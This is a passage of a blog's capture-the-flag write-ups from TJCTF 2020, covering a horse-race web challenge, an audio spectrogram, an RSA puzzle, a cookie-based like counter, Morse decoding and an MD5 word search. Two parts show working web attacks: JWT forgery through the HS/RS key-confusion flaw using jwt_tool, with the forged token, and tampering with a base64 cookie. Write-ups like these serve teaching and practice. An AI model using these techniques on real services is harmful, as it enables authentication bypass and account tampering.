<div class="highlight"><pre><span></span><code>╰─ python3 jwt_tool.py <span class="s2">"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjp0cnVlLCJpc19vbWthciI6ZmFsc2UsIm1vbmV5IjoxMDAsImhvcnNlcyI6W119.IwmdkE7qMzr_TzW_RvloMIz_36QKnGVcxh2FW7oUnVRztoyeRQd-LDuIXyPn7dyCaaeLLI3wXCeokCrnoBwdpqNFNInyzJEZORxBiGgHpHBpOAdVxhGOGN1dWw0pEw1so-VhGKCI5DVOtuKM_VXHqTbUtMKvoHYjwDIOTisQr1VJRR81Tu6uqzA6nf0Deu943KOMF42MEcI7yGjAwpoYMkz9CF3dX9dX1MrEIJZeN19iyfSB7apgm71gJqPJBTiI0xFKH1TXQHHfViaF8stdqDlPKo4FgWe1Ol5Zqf-fBqkv4GK_DyR36ws9Aw32ompXEPicR26JY_4nK8d_EJE5gxceN7az1xkVy9OQEpSuNDQDYBNrE7-gUtL8Q1PcwOkqN_RRT1XSEg_Cr05QOr6FDsbClQihx-Wf5pY_p58fu81_NbQRzjvQIYEBShJ6GVEXf4DB8W5SkA-KR17TdHxT7uWi270KBEQ92AWH4XtRRN01dR65px01X1M1MbkYvuPE3_QoegeN6_TP3GLEB4fMQyha_zD_OWp8Z8mzrcNERrR0933ODXujtPfQwgf7oqYXVjyfo3QYDsjgCBMejqyeIgzvVc-KpLyauDQPCxsqNalCUFwqo-0wkGJUkYAG0fwVbyi2AeWIJGPdBPF1cJ6-fkctoMwDvBzoGJnbcF93Gmc"</span>
<span class="nv">$$$$</span>$<span class="se">\ </span><span class="nv">$$</span><span class="se">\ </span> <span class="nv">$$</span><span class="se">\ </span><span class="nv">$$$$$$$$</span><span class="se">\ </span> <span class="nv">$$$$$$$$</span><span class="se">\ </span> <span class="nv">$$</span><span class="se">\ </span>
<span class="se">\_</span>_<span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> <span class="p">|</span> $<span class="se">\ </span> <span class="nv">$$</span> <span class="p">|</span><span class="se">\_</span>_<span class="nv">$$</span> __<span class="p">|</span> <span class="se">\_</span>_<span class="nv">$$</span> __<span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span>
<span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span>$<span class="se">\ </span><span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$$$$$</span><span class="se">\ </span> <span class="nv">$$$$$$</span><span class="se">\ </span> <span class="nv">$$</span> <span class="p">|</span>
<span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> <span class="nv">$$</span> <span class="nv">$$</span><span class="se">\$</span>$ <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> __<span class="nv">$$</span><span class="se">\ </span><span class="nv">$$</span> __<span class="nv">$$</span><span class="se">\ </span><span class="nv">$$</span> <span class="p">|</span>
<span class="nv">$$</span><span class="se">\ </span> <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$$$</span> _<span class="nv">$$$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> / <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> / <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> <span class="p">|</span>
<span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span>$ / <span class="se">\$</span><span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span><span class="nv">$$</span> <span class="p">|</span>
<span class="se">\$</span><span class="nv">$$$$</span>$ <span class="p">|</span><span class="nv">$$</span> / <span class="se">\$</span>$ <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span> <span class="nv">$$</span> <span class="p">|</span><span class="se">\$</span><span class="nv">$$$$</span>$ <span class="p">|</span><span class="se">\$</span><span class="nv">$$$$</span>$ <span class="p">|</span><span class="nv">$$</span> <span class="p">|</span>
<span class="se">\_</span>_____/ <span class="se">\_</span>_/ <span class="se">\_</span>_<span class="p">|</span> <span class="se">\_</span>_<span class="p">|</span><span class="nv">$$$$$$</span><span class="se">\_</span>_<span class="p">|</span> <span class="se">\_</span>_____/ <span class="se">\_</span>_____/ <span class="se">\_</span>_<span class="p">|</span>
Version <span class="m">1</span>.3.4 <span class="se">\_</span>_____<span class="p">|</span> @ticarpi
<span class="o">=====================</span>
Decoded Token Values:
<span class="o">=====================</span>
Token header values:
<span class="o">[</span>+<span class="o">]</span> <span class="nv">typ</span> <span class="o">=</span> <span class="s2">"JWT"</span>
<span class="o">[</span>+<span class="o">]</span> <span class="nv">alg</span> <span class="o">=</span> <span class="s2">"RS256"</span>
Token payload values:
<span class="o">[</span>+<span class="o">]</span> <span class="nv">user</span> <span class="o">=</span> True
<span class="o">[</span>+<span class="o">]</span> <span class="nv">is_omkar</span> <span class="o">=</span> False
<span class="o">[</span>+<span class="o">]</span> <span class="nv">money</span> <span class="o">=</span> <span class="m">100</span>
<span class="o">[</span>+<span class="o">]</span> <span class="nv">horses</span> <span class="o">=</span> <span class="o">[]</span>
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<p>Ok, now we have a valid token. But, before the race, we need to find a horse name speeder than the boss one. We can brute-force it with generate random name and check it the result with this name is bigger:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="k">def</span> <span class="nf">get_random_alphaNumeric_string</span><span class="p">(</span><span class="n">stringLength</span><span class="o">=</span><span class="mi">16</span><span class="p">):</span>
<span class="n">lettersAndDigits</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span>
<span class="k">return</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">((</span><span class="n">random</span><span class="o">.</span><span class="n">choice</span><span class="p">(</span><span class="n">lettersAndDigits</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">stringLength</span><span class="p">)))</span>
<span class="n">target</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">((</span><span class="s2">"Horse_MechaOmkar-YG6BPRJM"</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">horse_name</span> <span class="o">=</span> <span class="n">get_random_alphaNumeric_string</span><span class="p">()</span>
<span class="n">current</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">((</span><span class="s2">"Horse_"</span><span class="o">+</span><span class="n">horse_name</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="k">while</span> <span class="n">target</span> <span class="o">></span> <span class="n">current</span><span class="p">:</span>
<span class="n">horse_name</span> <span class="o">=</span> <span class="n">get_random_alphaNumeric_string</span><span class="p">()</span>
<span class="n">current</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">((</span><span class="s2">"Horse_To-the-flag-"</span><span class="o">+</span><span class="n">horse_name</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">(),</span> <span class="mi">16</span><span class="p">)</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="n">horse_name</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">current</span><span class="p">)</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>╰─ python hrose_name.py
fqXAic5PcqpNOvWM
<span class="m">340282346669807837605444135570825176873</span>
</code></pre></div>
<p>We can now edit back the JWT token and add our new horse name to the list.</p>
<p>This tool offer us to edit any value to the token and try some attack to validate this edits. The website use RS256 and we have the public key, we can use the HS/RS confusion.</p>
<div class="highlight"><pre><span></span><code>Please make a selection <span class="o">(</span><span class="m">1</span>-8<span class="o">)</span>
> <span class="nv">1</span>
<span class="o">====================================================================</span>
This option allows you to tamper with the header, contents and
signature of the JWT.
<span class="o">(</span>Force string values in claims by enclosing in <span class="s2">"double quotes"</span>
<span class="o">====================================================================</span>
Token header values:
<span class="o">[</span><span class="m">1</span><span class="o">]</span> <span class="nv">typ</span> <span class="o">=</span> <span class="s2">"JWT"</span>
<span class="o">[</span><span class="m">2</span><span class="o">]</span> <span class="nv">alg</span> <span class="o">=</span> <span class="s2">"RS256"</span>
<span class="o">[</span><span class="m">3</span><span class="o">]</span> *ADD A VALUE*
<span class="o">[</span><span class="m">4</span><span class="o">]</span> *DELETE A VALUE*
<span class="o">[</span><span class="m">0</span><span class="o">]</span> Continue to next step
Please <span class="k">select</span> a field number:
<span class="o">(</span>or <span class="m">0</span> to Continue<span class="o">)</span>
> <span class="m">0</span>
Token payload values:
<span class="o">[</span><span class="m">1</span><span class="o">]</span> <span class="nv">user</span> <span class="o">=</span> True
<span class="o">[</span><span class="m">2</span><span class="o">]</span> <span class="nv">is_omkar</span> <span class="o">=</span> False
<span class="o">[</span><span class="m">3</span><span class="o">]</span> <span class="nv">money</span> <span class="o">=</span> <span class="m">100</span>
<span class="o">[</span><span class="m">4</span><span class="o">]</span> <span class="nv">horses</span> <span class="o">=</span> <span class="o">[]</span>
<span class="o">[</span><span class="m">5</span><span class="o">]</span> *ADD A VALUE*
<span class="o">[</span><span class="m">6</span><span class="o">]</span> *DELETE A VALUE*
<span class="o">[</span><span class="m">0</span><span class="o">]</span> Continue to next step
Please <span class="k">select</span> a field number:
<span class="o">(</span>or <span class="m">0</span> to Continue<span class="o">)</span>
> <span class="m">4</span>
Current value of horses is: <span class="o">[]</span>
Please enter new value and hit ENTER
> <span class="o">[</span><span class="s1">'fqXAic5PcqpNOvWM'</span><span class="o">]</span>
<span class="o">[</span><span class="m">1</span><span class="o">]</span> <span class="nv">user</span> <span class="o">=</span> True
<span class="o">[</span><span class="m">2</span><span class="o">]</span> <span class="nv">is_omkar</span> <span class="o">=</span> False
<span class="o">[</span><span class="m">3</span><span class="o">]</span> <span class="nv">money</span> <span class="o">=</span> <span class="m">100</span>
<span class="o">[</span><span class="m">4</span><span class="o">]</span> <span class="nv">horses</span> <span class="o">=</span> <span class="o">[</span><span class="s1">'fqXAic5PcqpNOvWM'</span><span class="o">]</span>
<span class="o">[</span><span class="m">5</span><span class="o">]</span> *ADD A VALUE*
<span class="o">[</span><span class="m">6</span><span class="o">]</span> *DELETE A VALUE*
<span class="o">[</span><span class="m">0</span><span class="o">]</span> Continue to next step
Please <span class="k">select</span> a field number:
<span class="o">(</span>or <span class="m">0</span> to Continue<span class="o">)</span>
> <span class="m">0</span>
Token Signing:
<span class="o">[</span><span class="m">1</span><span class="o">]</span> Sign token with known HMAC-SHA <span class="s1">'secret'</span>
<span class="o">[</span><span class="m">2</span><span class="o">]</span> Sign token with RSA/ECDSA Private Key
<span class="o">[</span><span class="m">3</span><span class="o">]</span> Strip signature using the <span class="s2">"none"</span> algorithm
<span class="o">[</span><span class="m">4</span><span class="o">]</span> Sign with HS/RSA key confusion vulnerability
<span class="o">[</span><span class="m">5</span><span class="o">]</span> Sign token with key file
<span class="o">[</span><span class="m">6</span><span class="o">]</span> Inject a key and self-sign the token <span class="o">(</span>CVE-2018-0114<span class="o">)</span>
<span class="o">[</span><span class="m">7</span><span class="o">]</span> Self-sign the token and <span class="nb">export</span> an external JWKS
<span class="o">[</span><span class="m">8</span><span class="o">]</span> Keep original signature
Please <span class="k">select</span> an option from above <span class="o">(</span><span class="m">1</span>-5<span class="o">)</span>:
> <span class="m">4</span>
Please enter the Public Key filename:
> pubkey.pem
<span class="o">====================================================================</span>
This option takes an available Public Key <span class="o">(</span>the SSL certificate from
a webserver, <span class="k">for</span> example?<span class="o">)</span> and switches the RSA-signed
<span class="o">(</span>RS256/RS384/RS512<span class="o">)</span> JWT that uses the Public Key as its <span class="s1">'secret'</span>.
<span class="o">====================================================================</span>
File loaded: pubkey.pem
Set this new token as the AUTH cookie, or session/local storage data <span class="o">(</span>as appropriate <span class="k">for</span> the web application<span class="o">)</span>.
<span class="o">(</span>This will only be valid on unpatched implementations of JWT.<span class="o">)</span>
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjp0cnVlLCJpc19vbWthciI6ZmFsc2UsIm1vbmV5IjoxMDAsImhvcnNlcyI6WyJmcVhBaWM1UGNxcE5PdldNIl19.G7DkuL3tsxmvHCnWs1jYzNK7altEuMJebYu8CGbiNCY
</code></pre></div>
<p>We replace the current one in the browser with the one generated. We have now our horse in the race list.</p>
<p><img alt="MoarHorse4.png" src="https://blog.nlegall.fr/images/tjctf/2020/MoarHorse4.png"></p>
<p>You select the horse in the list and:</p>
<div class="highlight"><pre><span></span><code>You won!
Here's your flag: tjctf{w0www_y0ur_h0rs3_is_f444ST!}
</code></pre></div>TJCTF2020 - Rap God2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-rap-god.html<p><em>solves : 172</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by rj9
My rapper friend Big Y sent me his latest track but something sounded a little off about it. Help me find out if he was trying to tell me something with it. Submit your answer as tjctf{message}
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/302ed01b56ae5988e8b8ad8d9bba402a2934c71508593f5dc9e95aed913d20cf_BigYAudio.mp3">Audio file</a></p>
<p>We start to …</p><p><em>solves : 172</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by rj9
My rapper friend Big Y sent me his latest track but something sounded a little off about it. Help me find out if he was trying to tell me something with it. Submit your answer as tjctf{message}
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/302ed01b56ae5988e8b8ad8d9bba402a2934c71508593f5dc9e95aed913d20cf_BigYAudio.mp3">Audio file</a></p>
<p>We start to open the audio file. The classic view doesn't show anything but the spectrogramm one shows up something much better:</p>
<p><img alt="rapgod_spect.png" src="https://blog.nlegall.fr/images/tjctf/2020/rapgod_spect.png"></p>
<p>We have some strange symboles mixup witht the audio. They remember me a old font I was using kid with Word: wingdings. They are fonts only composed with symboles.</p>
<p>I don't want to install Word and the font again, so let's try to find a tool online who can decode it. I foudn this one: http://grompe.org.ru/static/wingdings_gaster.html.</p>
<p>We can input the symbol by click on them. And the flag appears: <code>tjctf{QUICKSONIC}</code>.</p>TJCTF2020 - RSABC2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-rsabc.html<p><em>solves : 415</em></p>
<div class="highlight"><pre><span></span><code>Written by boomo
I was just listening to some relaxing ASMR when a notification popped up with this.
???
Hint: It's easy as R-S-A! Wait..
</code></pre></div>
<p>We have this informations:</p>
<div class="highlight"><pre><span></span><code>n=57772961349879658023983283615621490728299498090674385733830087914838280699121
e=65537
c=36913885366666102438288732953977798352561146298725524881805840497762448828130
</code></pre></div>
<p>Ok, it's RSA. The challenge name and the informations confirm it. We can …</p><p><em>solves : 415</em></p>
<div class="highlight"><pre><span></span><code>Written by boomo
I was just listening to some relaxing ASMR when a notification popped up with this.
???
Hint: It's easy as R-S-A! Wait..
</code></pre></div>
<p>We have this informations:</p>
<div class="highlight"><pre><span></span><code>n=57772961349879658023983283615621490728299498090674385733830087914838280699121
e=65537
c=36913885366666102438288732953977798352561146298725524881805840497762448828130
</code></pre></div>
<p>Ok, it's RSA. The challenge name and the informations confirm it. We can use <a href="https://github.com/Ganapati/RsaCtfTool">RsaCtfTool</a> to perform the decoding locally:</p>
<div class="highlight"><pre><span></span><code>╰─ python RsaCtfTool.py -n <span class="m">57772961349879658023983283615621490728299498090674385733830087914838280699121</span> -e <span class="m">65537</span> --uncipher <span class="m">36913885366666102438288732953977798352561146298725524881805840497762448828130</span>
<span class="o">[</span>*<span class="o">]</span> Testing key /tmp/tmpg5207siz.
Can<span class="s1">'t load boneh_durfee because sage is not installed</span>
<span class="s1">Can'</span>t load smallfraction because sage is not installed
Can<span class="s1">'t load qicheng because sage is not installed</span>
<span class="s1">Can'</span>t load ecm2 because sage is not installed
Can<span class="s1">'t load roca because sage is not installed</span>
<span class="s1">Can'</span>t load ecm because sage is not installed
<span class="o">[</span>*<span class="o">]</span> Performing factordb attack on /tmp/tmpg5207siz.
Results <span class="k">for</span> /tmp/tmpg5207siz:
Unciphered data :
b<span class="s1">'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00tjctf{BOLm1QMWi3c}'</span>
</code></pre></div>
<p>We have some extra bytes but the flag is back: <code>tjctf{BOLm1QMWi3c}</code>.</p>TJCTF2020 - Sarah Palin Fanpage2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-sarah-palin-fanpage.html<p><em>solves : 505</em></p>
<div class="highlight"><pre><span></span><code>Points: 35
Written by jpes707
Are you a true fan of Alaska's most famous governor? Visit the Sarah Palin fanpage.
</code></pre></div>
<p><img alt="sarahpalinfanpage_homepage.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_homepage.png"></p>
<p><img alt="sarahpalinfanpage_blocked.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_blocked.png"></p>
<p>So, we need to have the all likes but can't get more that 4 on the website. We can detect as spam. The source code doesn't help …</p><p><em>solves : 505</em></p>
<div class="highlight"><pre><span></span><code>Points: 35
Written by jpes707
Are you a true fan of Alaska's most famous governor? Visit the Sarah Palin fanpage.
</code></pre></div>
<p><img alt="sarahpalinfanpage_homepage.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_homepage.png"></p>
<p><img alt="sarahpalinfanpage_blocked.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_blocked.png"></p>
<p>So, we need to have the all likes but can't get more that 4 on the website. We can detect as spam. The source code doesn't help to bypass hit. But, the likes seems stored somewhere. The basic place is within a cookie.</p>
<p>We found one, <code>data</code>, but seems encoded.</p>
<div class="highlight"><pre><span></span><code>╰─ <span class="nb">printf</span> <span class="s2">"eyIxIjpmYWxzZSwiMiI6ZmFsc2UsIjMiOmZhbHNlLCI0IjpmYWxzZSwiNSI6ZmFsc2UsIjYiOnRydWUsIjciOnRydWUsIjgiOnRydWUsIjkiOnRydWUsIjEwIjp0cnVlfQ=="</span> <span class="p">|</span> base64 -d
<span class="o">{</span><span class="s2">"1"</span>:false,<span class="s2">"2"</span>:false,<span class="s2">"3"</span>:false,<span class="s2">"4"</span>:false,<span class="s2">"5"</span>:false,<span class="s2">"6"</span>:true,<span class="s2">"7"</span>:true,<span class="s2">"8"</span>:true,<span class="s2">"9"</span>:true,<span class="s2">"10"</span>:true<span class="o">}</span>
</code></pre></div>
<p>We can edit it back with all value from <code>false</code> to <code>true</code> and put it back to the browser:</p>
<div class="highlight"><pre><span></span><code>╰─ <span class="nb">printf</span> <span class="s1">'{"1":true,"2":true,"3":true,"4":true,"5":true,"6":true,"7":true,"8":true,"9":true,"10":true}'</span> <span class="p">|</span> base64
<span class="nv">eyIxIjp0cnVlLCIyIjp0cnVlLCIzIjp0cnVlLCI0Ijp0cnVlLCI1Ijp0cnVlLCI2Ijp0cnVlLCI3Ijp0cnVlLCI4Ijp0cnVlLCI5Ijp0cnVlLCIxMCI6dHJ1ZX0</span><span class="o">=</span>
</code></pre></div>
<p><img alt="sarahpalinfanpage_flag.png" src="https://blog.nlegall.fr/images/tjctf/2020/sarahpalinfanpage_flag.png"></p>TJCTF2020 - Tap Dancing2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-tap-dancing.html<p><em>solves : 215</em></p>
<div class="highlight"><pre><span></span><code>Points: 25
Written by agcdragon
My friend is trying to teach me to dance, but I am not rhythmically coordinated! They sent me a list of dance moves but they're all numbers! Can you help me figure out what they mean so I can learn the dance …</code></pre></div><p><em>solves : 215</em></p>
<div class="highlight"><pre><span></span><code>Points: 25
Written by agcdragon
My friend is trying to teach me to dance, but I am not rhythmically coordinated! They sent me a list of dance moves but they're all numbers! Can you help me figure out what they mean so I can learn the dance?
NOTE: Flag is not in flag format.
</code></pre></div>
<p>We have this text as cipher text: <code>1101111102120222020120111110101222022221022202022211</code>.</p>
<p>We have three different char, so not binary encode. Another cipher method that use three different char is Morse.</p>
<p>Let's try to convert it to Morse. We can try so different combinations to get the working one. The correct one give us this:</p>
<div class="highlight"><pre><span></span><code><span class="mi">1</span> <span class="o">-</span>
<span class="mi">2</span> <span class="p">.</span>
<span class="mi">0</span>
<span class="c1">-- ----- .-. ... . -. ----- - -... ....- ... . ...--</span>
</code></pre></div>
<p>We can use the following python code to perform the decoding or any online tool:</p>
<div class="highlight"><pre><span></span><code><span class="n">MORSE_CODE_DICT</span> <span class="o">=</span> <span class="p">{</span> <span class="s1">'A'</span><span class="p">:</span><span class="s1">'.-'</span><span class="p">,</span> <span class="s1">'B'</span><span class="p">:</span><span class="s1">'-...'</span><span class="p">,</span>
<span class="s1">'C'</span><span class="p">:</span><span class="s1">'-.-.'</span><span class="p">,</span> <span class="s1">'D'</span><span class="p">:</span><span class="s1">'-..'</span><span class="p">,</span> <span class="s1">'E'</span><span class="p">:</span><span class="s1">'.'</span><span class="p">,</span>
<span class="s1">'F'</span><span class="p">:</span><span class="s1">'..-.'</span><span class="p">,</span> <span class="s1">'G'</span><span class="p">:</span><span class="s1">'--.'</span><span class="p">,</span> <span class="s1">'H'</span><span class="p">:</span><span class="s1">'....'</span><span class="p">,</span>
<span class="s1">'I'</span><span class="p">:</span><span class="s1">'..'</span><span class="p">,</span> <span class="s1">'J'</span><span class="p">:</span><span class="s1">'.---'</span><span class="p">,</span> <span class="s1">'K'</span><span class="p">:</span><span class="s1">'-.-'</span><span class="p">,</span>
<span class="s1">'L'</span><span class="p">:</span><span class="s1">'.-..'</span><span class="p">,</span> <span class="s1">'M'</span><span class="p">:</span><span class="s1">'--'</span><span class="p">,</span> <span class="s1">'N'</span><span class="p">:</span><span class="s1">'-.'</span><span class="p">,</span>
<span class="s1">'O'</span><span class="p">:</span><span class="s1">'---'</span><span class="p">,</span> <span class="s1">'P'</span><span class="p">:</span><span class="s1">'.--.'</span><span class="p">,</span> <span class="s1">'Q'</span><span class="p">:</span><span class="s1">'--.-'</span><span class="p">,</span>
<span class="s1">'R'</span><span class="p">:</span><span class="s1">'.-.'</span><span class="p">,</span> <span class="s1">'S'</span><span class="p">:</span><span class="s1">'...'</span><span class="p">,</span> <span class="s1">'T'</span><span class="p">:</span><span class="s1">'-'</span><span class="p">,</span>
<span class="s1">'U'</span><span class="p">:</span><span class="s1">'..-'</span><span class="p">,</span> <span class="s1">'V'</span><span class="p">:</span><span class="s1">'...-'</span><span class="p">,</span> <span class="s1">'W'</span><span class="p">:</span><span class="s1">'.--'</span><span class="p">,</span>
<span class="s1">'X'</span><span class="p">:</span><span class="s1">'-..-'</span><span class="p">,</span> <span class="s1">'Y'</span><span class="p">:</span><span class="s1">'-.--'</span><span class="p">,</span> <span class="s1">'Z'</span><span class="p">:</span><span class="s1">'--..'</span><span class="p">,</span>
<span class="s1">'1'</span><span class="p">:</span><span class="s1">'.----'</span><span class="p">,</span> <span class="s1">'2'</span><span class="p">:</span><span class="s1">'..---'</span><span class="p">,</span> <span class="s1">'3'</span><span class="p">:</span><span class="s1">'...--'</span><span class="p">,</span>
<span class="s1">'4'</span><span class="p">:</span><span class="s1">'....-'</span><span class="p">,</span> <span class="s1">'5'</span><span class="p">:</span><span class="s1">'.....'</span><span class="p">,</span> <span class="s1">'6'</span><span class="p">:</span><span class="s1">'-....'</span><span class="p">,</span>
<span class="s1">'7'</span><span class="p">:</span><span class="s1">'--...'</span><span class="p">,</span> <span class="s1">'8'</span><span class="p">:</span><span class="s1">'---..'</span><span class="p">,</span> <span class="s1">'9'</span><span class="p">:</span><span class="s1">'----.'</span><span class="p">,</span>
<span class="s1">'0'</span><span class="p">:</span><span class="s1">'-----'</span><span class="p">,</span> <span class="s1">', '</span><span class="p">:</span><span class="s1">'--..--'</span><span class="p">,</span> <span class="s1">'.'</span><span class="p">:</span><span class="s1">'.-.-.-'</span><span class="p">,</span>
<span class="s1">'?'</span><span class="p">:</span><span class="s1">'..--..'</span><span class="p">,</span> <span class="s1">'/'</span><span class="p">:</span><span class="s1">'-..-.'</span><span class="p">,</span> <span class="s1">'-'</span><span class="p">:</span><span class="s1">'-....-'</span><span class="p">,</span>
<span class="s1">'('</span><span class="p">:</span><span class="s1">'-.--.'</span><span class="p">,</span> <span class="s1">')'</span><span class="p">:</span><span class="s1">'-.--.-'</span><span class="p">}</span>
<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">message</span><span class="p">):</span>
<span class="n">message</span> <span class="o">+=</span> <span class="s1">' '</span>
<span class="n">decipher</span> <span class="o">=</span> <span class="s1">''</span>
<span class="n">citext</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">for</span> <span class="n">letter</span> <span class="ow">in</span> <span class="n">message</span><span class="p">:</span>
<span class="k">if</span> <span class="p">(</span><span class="n">letter</span> <span class="o">!=</span> <span class="s1">' '</span><span class="p">):</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">citext</span> <span class="o">+=</span> <span class="n">letter</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="mi">2</span> <span class="p">:</span>
<span class="n">decipher</span> <span class="o">+=</span> <span class="s1">' '</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">decipher</span> <span class="o">+=</span> <span class="nb">list</span><span class="p">(</span><span class="n">MORSE_CODE_DICT</span><span class="o">.</span><span class="n">keys</span><span class="p">())[</span><span class="nb">list</span><span class="p">(</span><span class="n">MORSE_CODE_DICT</span>
<span class="o">.</span><span class="n">values</span><span class="p">())</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="n">citext</span><span class="p">)]</span>
<span class="n">citext</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">return</span> <span class="n">decipher</span>
<span class="n">message</span> <span class="o">=</span> <span class="s2">"-- ----- .-. ... . -. ----- - -... ....- ... . ...--"</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"tjctf{"</span> <span class="o">+</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">message</span><span class="p">)</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span> <span class="o">+</span> <span class="s2">"}"</span><span class="p">)</span>
</code></pre></div>
<p>Let's run it and get the flag!</p>
<div class="highlight"><pre><span></span><code>╰─ python decode.py
tjctf<span class="o">{</span>m0rsen0tb4se3<span class="o">}</span>
</code></pre></div>TJCTF2020 - Titanic2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-titanic.html<p><em>solves : 256</em></p>
<div class="highlight"><pre><span></span><code>Points: 35
Written by jpes707
I wrapped tjctf{} around the lowercase version of a word said in the 1997 film "Titanic" and created an MD5 hash of it: 9326ea0931baf5786cde7f280f965ebb.
</code></pre></div>
<p>We have all the informations to find the clear text:</p>
<ul>
<li>A word from the Titanic movie script: (here)[https …</li></ul><p><em>solves : 256</em></p>
<div class="highlight"><pre><span></span><code>Points: 35
Written by jpes707
I wrapped tjctf{} around the lowercase version of a word said in the 1997 film "Titanic" and created an MD5 hash of it: 9326ea0931baf5786cde7f280f965ebb.
</code></pre></div>
<p>We have all the informations to find the clear text:</p>
<ul>
<li>A word from the Titanic movie script: (here)[https://www.imsdb.com/scripts/Titanic.html]</li>
<li>Wrapped with the flag format: <code>tjctf{script_word}</code></li>
<li>Hash with MD5 algorithm</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">hashlib</span>
<span class="n">m</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">()</span>
<span class="n">filepath</span> <span class="o">=</span> <span class="s1">'Titanic.txt'</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
<span class="n">line</span> <span class="o">=</span> <span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span>
<span class="k">while</span> <span class="n">line</span><span class="p">:</span>
<span class="n">words</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span>
<span class="k">for</span> <span class="n">word</span> <span class="ow">in</span> <span class="n">words</span><span class="p">:</span>
